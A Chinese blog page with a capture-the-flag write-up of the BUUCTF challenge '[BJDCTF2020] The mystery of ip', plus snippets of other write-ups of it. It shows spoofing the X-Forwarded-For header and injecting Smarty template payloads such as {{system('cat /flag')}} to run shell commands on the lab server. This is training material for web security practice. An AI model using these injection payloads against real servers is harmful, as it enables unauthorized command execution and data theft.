web buuctf [BJDCTF2020]The mystery of ip1

最新推荐文章于 2022-07-04 08:15:42 发布
最新推荐文章于 2022-07-04 08:15:42 发布
阅读量856 收藏 3
点赞数 1
文章标签: ssti xff
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44214568/article/details/123712950
版权

考点:ssti模板注入

1.打开网页,先到hint里看有没有线索,查看源代码里面有一个注释内容是

<!-- Do you know why i know your ip? -->

应该是和ip的来源有关系,很有可能是和xff有关;

查看flag,就是一个ip地址

抓包后,在消息头添加X-Forwarded-For,设置参数值为1.1.1.1,发现回显出来的ip变成了1.1.1.1

2.怀疑可能存在xff注入,在后面加' 加or '1=1' 都回显的是本身的内容,联想是否存在模板注入,令xff={{1+2}},回显Ip为3,存在ssti

3.xff={{system('ls')}}

随后令xff={{system('ls /')}}  xff={{system('cat /flag')}} 

 

半杯雨水敬过客
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
The Mystery of Legend-开源
06-28
一个关于传奇之谜的游戏,艾伦需要点燃它。 JRPG风格的游戏。
BUUCTF:[BJDCTF2020]The mystery of ip---------SSTI py
Zero_Adam的博客
02-13 264
这个题,思路没想到,题做少了,,, 不足: 没有看出思路来。没有想到是ssti 关键字测试的时候system(‘ls’) system('ls / ')。别tm憨憨地写个system放那就不管了,,,憨球 对ssti太不重视,只知道看一个jinja2的模板,,不知道又Twig模板注入漏洞。 WP 这里一直说IP。就抓包加上 X-Forearded-For :127.0.0.1. 跟着变化了,XFF可控,但因为是PHP页面,所以没有想到使ssti。后来才知道 Flask 可能存在 jinja2模板注入
BUUCTF WEB [BJDCTF2020]The mystery of ip
Y1da的博客
04-22 3568
BUUCTF WEB [BJDCTF2020]The mystery of ip 在hint.php中找到一句注释 <!-- Do you know why i know your ip? --> 在flag.php中看到自己的ip,联想到X-Forwarded-For。使用Hackbar添加一个HTTP头 X-Forwarded-For: 127.0.0.1 回显为 Your IP is : 127.0.0.1 说明我们获得了可控变量 尝试命令注入失败,到这里就没什么思路
[BJDCTF2020]The mystery of ip 1
qq_43618536的博客
07-04 585
BUUCTF的[BJDCTF2020]The mystery of ip 1
BUUCTF-web类-[BJDCTF2020]The mystery of ip
weixin_44622228的博客
04-19 1512
BUUCTF-web类-[BJDCTF2020]The mystery of ip 这是一道很有意思的题目。 靶机首页 有Flag和Hint按钮,查看Flag试试 发现有我们本机IP的回显,很有可能是http请求头中有XFF信息将我们ip一起带过去了,我们先试试伪造XFF头看看情况。 发现确实是会变化,第一步猜想有没有可能是XFF注入? 我简单了在xff后面加了单引号,也在sqlmap上跑了一下,...
The Mystery
06-23
The Mystery Method_cn.rar
Mystery of Mobile Data Collecting AND Processing》PDF版本下载.txt
07-17
Mystery of Mobile Data Collecting AND Processing》PDF版本下载
【精品】备考2011高效学习方案英语高三册:Units 13~14  The mystery of the Moonstone & Zoology.doc
08-19
【精品】备考2011高效学习方案英语高三册:Units 13~14 The mystery of the Moonstone & Zoology.doc
22-郑康鹏-The Mystery Machine:End-to-end performance analysis of la
08-04
Thomas F. Wenisch, University of Michigan11th USENIX Symposium on Operating Syst
BUUCTF:[BJDCTF2020]The mystery of ip
末初的CSDN博客
04-18 891
https://buuoj.cn/challenges#[BJDCTF2020]The%20mystery%20of%20ip 回显了IP,在hint.php有提示Do you know why i know your ip? 尝试修改X-Forwarded-For 猜测这里可能是SSTI,输入{{7*7}} 确定了是SSTI,尝试{{config}} 看报错发现这里应该是PHP的一种比较老的引擎Smarty 查看版本 {$smarty.version} 版本是:3.1.34-dev-7 查
buuctf-[BJDCTF2020]The mystery of ip
qq_42728977的博客
12-23 1303
[BJDCTF2020]The mystery of ip考点复现参考 考点 模板注入 复现 看到提示,说是怎么知道我的ip,那就说明应该是该请求头,然后模板注入,然后发现果然是。 在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A
【学习笔记 37】 buu [BJDCTF2020]The mystery of ip
weixin_43553654的博客
08-01 360
0x00 知识点 tplmap探测是否存在模板注入漏洞 smartly模板注入 0x01 知识点详解 tplmap的使用方法? 答:这里只用到python tplmap.py -u 'curl',想了解详情的话这里附上一篇大佬的博客。 什么是smartly模板引擎注入? 答:这里参考这篇文章 解题思路 打开网站一看 就看到了他提示的flag,那还不点开看看 提示到了我的IP,这一瞬间就让我想到了http的请求头里的XXF参数和Client-ip参数,想了解http请求头详情的请去看我的上一篇文
[BJDCTF2020]The mystery of ip (每日一题)
qq_51684648的博客
09-09 266
[BJDCTF2020]The mystery of ip (每日一题) 1,打开网页,看到了flag的标识,点进去发现: 2,想起伪造ip,尝试抓包,伪造ip,发现没什么变化 3,尝试改成本地ip,发现ip值变化,也许可以在这里做文章 4,将ip改为{7*8},被当成语句执行了 5,尝试用系统命令{system(“ls”)},发现可以执行,构造{system(“cat /flag”)},得到flag ...
[BJDCTF2020]The mystery of ip
qq_43801002的博客
07-30 1175
题目 过程 1.抓包分析,flag.php,hint.php,index.php,发现貌似和ip有关 2.客户端请求头,XFF和client-ip都可。发现可以控制输入 3.尝试是否可以进行逻辑运算{7*8},发现可以 4.尝试系统命令client-ip:{system('ls')}发现可以,尝试cat /flag,没有任何过滤 ...
BUUCTF】[BJDCTF2020]The mystery of ip
aoao331198的博客
04-23 355
X-Forwarded-For 看到题目,要首先想到这个 BP在http头里面增加X-Forwarded-For,发现是可控的,可能存在模板注入 让X-Forwarded-For={{7*7}} 接下来常规思路注入命令 X-Forwarded-For={{system("cat /flag")}} 过程没什么好说的,贴一下源码 <?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $
resnet模型-基于图像分类算法对汉字写的是否工整识别-不含数据集图片-含逐行注释和说明文档.zip
最新发布
05-23
resnet模型_基于图像分类算法对汉字写的是否工整识别-不含数据集图片-含逐行注释和说明文档 本代码是基于python pytorch环境安装的。 下载本代码后,有个环境安装的requirement.txt文本 如果有环境安装不会的,可自行网上搜索如何安装python和pytorch,这些环境安装都是有很多教程的,简单的 环境需要自行安装,推荐安装anaconda然后再里面推荐安装python3.7或3.8的版本,pytorch推荐安装1.7.1或1.8.1版本 首先是代码的整体介绍 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01生成txt.py,
[bjdctf2020]the mystery of ip
03-16
这是一道关于IP地址的谜题,需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号,我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络数据包,然后分析其中的IP地址和端口号,以及数据包的内容和协议类型,来解决这个谜题。同时,我们还需要了解一些常见的网络攻击和防御技术,以便更好地理解和解决这个谜题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值